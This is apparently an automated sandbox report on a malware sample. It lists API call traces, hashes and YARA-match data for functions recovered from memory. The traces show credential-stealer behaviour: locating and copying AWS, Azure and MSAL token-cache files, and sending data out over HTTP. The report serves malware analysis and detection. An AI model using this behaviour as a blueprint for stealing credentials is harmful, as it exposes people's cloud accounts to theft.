                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction Fuzzy Hash: 5C41A879740634EBC718AFE5FC89B987F71AB4C712BA0C062F90299190CBB5D5119B3E
                                                  APIs
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B39B08
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B39B21
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B39B39
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B39B51
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B39B6A
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B39B82
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B39B9A
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B39BB3
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B39BCB
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B39BE3
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B39BFC
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B39C14
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B39C2C
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B39C45
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 00B39C5D
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 00B39C75
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 00B39C8E
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 00B39CA6
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 00B39CBE
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 00B39CD7
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 00B39CEF
                                                  • LoadLibraryA.KERNEL32(0064A550,?,00B36C67), ref: 00B39D01
                                                  • LoadLibraryA.KERNEL32(0064A17C,?,00B36C67), ref: 00B39D12
                                                  • LoadLibraryA.KERNEL32(0064A104,?,00B36C67), ref: 00B39D24
                                                  • LoadLibraryA.KERNEL32(0064A1DC,?,00B36C67), ref: 00B39D36
                                                  • LoadLibraryA.KERNEL32(0064A328,?,00B36C67), ref: 00B39D47
                                                  • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 00B39D69
                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 00B39D8A
                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 00B39DA2
                                                  • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 00B39DC4
                                                  • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 00B39DE5
                                                  • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 00B39E06
                                                  • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 00B39E1D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID:
                                                  • API String ID: 2238633743-0
                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction ID: a87cb595ebfe859e8152a93ea2a2edd90f7f986e8383f0bfe95b546f4b10d869
                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction Fuzzy Hash: 2DA13CBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D6399841DB52
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B29C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                    • Part of subcall function 00B29C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                    • Part of subcall function 00B29C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                    • Part of subcall function 00B29C27: ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                    • Part of subcall function 00B29C27: LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                    • Part of subcall function 00B29C27: CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                    • Part of subcall function 00B39097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B390B9
                                                  • strtok_s.MSVCRT ref: 00B30582
                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00B305C9
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B305D0
                                                  • StrStrA.SHLWAPI(00000000,00421618), ref: 00B305EC
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B305FA
                                                    • Part of subcall function 00B38B47: malloc.MSVCRT ref: 00B38B4F
                                                    • Part of subcall function 00B38B47: strncpy.MSVCRT ref: 00B38B6A
                                                  • StrStrA.SHLWAPI(00000000,00421620), ref: 00B30636
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30644
                                                  • StrStrA.SHLWAPI(00000000,00421628), ref: 00B30680
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B3068E
                                                  • StrStrA.SHLWAPI(00000000,00421630), ref: 00B306CA
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B306DC
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30769
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30781
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B30799
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B307B1
                                                  • lstrcat.KERNEL32(?,0042164C), ref: 00B307C9
                                                  • lstrcat.KERNEL32(?,00421660), ref: 00B307D8
                                                  • lstrcat.KERNEL32(?,00421670), ref: 00B307E7
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B307FA
                                                  • lstrcat.KERNEL32(?,00421678), ref: 00B30809
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3081C
                                                  • lstrcat.KERNEL32(?,0042167C), ref: 00B3082B
                                                  • lstrcat.KERNEL32(?,00421680), ref: 00B3083A
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3084D
                                                  • lstrcat.KERNEL32(?,00421688), ref: 00B3085C
                                                  • lstrcat.KERNEL32(?,0042168C), ref: 00B3086B
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3087E
                                                  • lstrcat.KERNEL32(?,00421698), ref: 00B3088D
                                                  • lstrcat.KERNEL32(?,0042169C), ref: 00B3089C
                                                  • strtok_s.MSVCRT ref: 00B308E0
                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B308F5
                                                  • memset.MSVCRT ref: 00B30944
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                  • String ID:
                                                  • API String ID: 3689735781-0
                                                  • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                  • Instruction ID: bc72e083eaf7eab4a73ae803530e7266f270aaa2d79bb4cf3ee9cc19cf7a6027
                                                  • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                  • Instruction Fuzzy Hash: 93D15076A40208ABCB04FBF4DD96EEEB7B9EF15701F604598F142B6091DF34AA05CB61
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                  • StrCmpCA.SHLWAPI(?,0086C060), ref: 00405A13
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0086C080,00000000,?,00832AD0,00000000,?,00421A1C), ref: 00405E71
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                  • memcpy.MSVCRT(?), ref: 00405EFE
                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                  • HttpOpenRequestA.WININET(00000000,0086C0A0,?,0086B718,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                  • String ID: "$"$------$------$------
                                                  • API String ID: 1406981993-2180234286
                                                  • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                  • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                  • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                  • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                  APIs
                                                  • memset.MSVCRT ref: 00414D87
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • memset.MSVCRT ref: 00414E13
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  • memset.MSVCRT ref: 00414E9F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0086C040,?,000003E8), ref: 00414A4A
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                  • memset.MSVCRT ref: 00414F2B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                  • API String ID: 4017274736-156832076
                                                  • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                  • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                  • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                  • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00832A10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                  • lstrcatA.KERNEL32(?,00000000,008671F0,00421474,008671F0,00421470,00000000), ref: 0040D208
                                                  • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                  • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                  • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                  • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                  • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                  • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                  • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00867190,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                  • lstrlenA.KERNEL32(?), ref: 0040D339
                                                  • memset.MSVCRT ref: 0040D388
                                                    • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                  • String ID:
                                                  • API String ID: 2775534915-0
                                                  • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                  • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                  • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                  • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2D1EA
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B2D32E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B2D335
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B2D46F
                                                  • lstrcat.KERNEL32(?,00421478), ref: 00B2D47E
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B2D491
                                                  • lstrcat.KERNEL32(?,0042147C), ref: 00B2D4A0
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B2D4B3
                                                  • lstrcat.KERNEL32(?,00421480), ref: 00B2D4C2
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B2D4D5
                                                  • lstrcat.KERNEL32(?,00421484), ref: 00B2D4E4
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B2D4F7
                                                  • lstrcat.KERNEL32(?,00421488), ref: 00B2D506
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B2D519
                                                  • lstrcat.KERNEL32(?,0042148C), ref: 00B2D528
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B2D53B
                                                  • lstrcat.KERNEL32(?,00421490), ref: 00B2D54A
                                                    • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                    • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                  • lstrlen.KERNEL32(?), ref: 00B2D591
                                                  • lstrlen.KERNEL32(?), ref: 00B2D5A0
                                                  • memset.MSVCRT ref: 00B2D5EF
                                                    • Part of subcall function 00B3ACD7: StrCmpCA.SHLWAPI(0064A350,00B2AA0E,?,00B2AA0E,0064A350), ref: 00B3ACF6
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B2D61B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                  • String ID:
                                                  • API String ID: 1973479514-0
                                                  • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                  • Instruction ID: a29cf17a3239687ad1fa019d40a013c96fcd566c7d404b2c53821cf466ef105b
                                                  • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                  • Instruction Fuzzy Hash: 9AE15D76950118ABCB04FBE0DD96EEE73B9AF15701F704199F146B20A1DE34AA08CF62
                                                  APIs
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                    • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                    • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                    • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B25C5F
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B25C7A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B25DFA
                                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 00B260D8
                                                  • lstrlen.KERNEL32(00000000), ref: 00B260E9
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B260FA
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B26101
                                                  • lstrlen.KERNEL32(00000000), ref: 00B26116
                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00B2612D
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2613F
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B26158
                                                  • memcpy.MSVCRT(?), ref: 00B26165
                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00B26182
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B26196
                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B261B3
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B26217
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B26224
                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B25E5F
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B2622E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
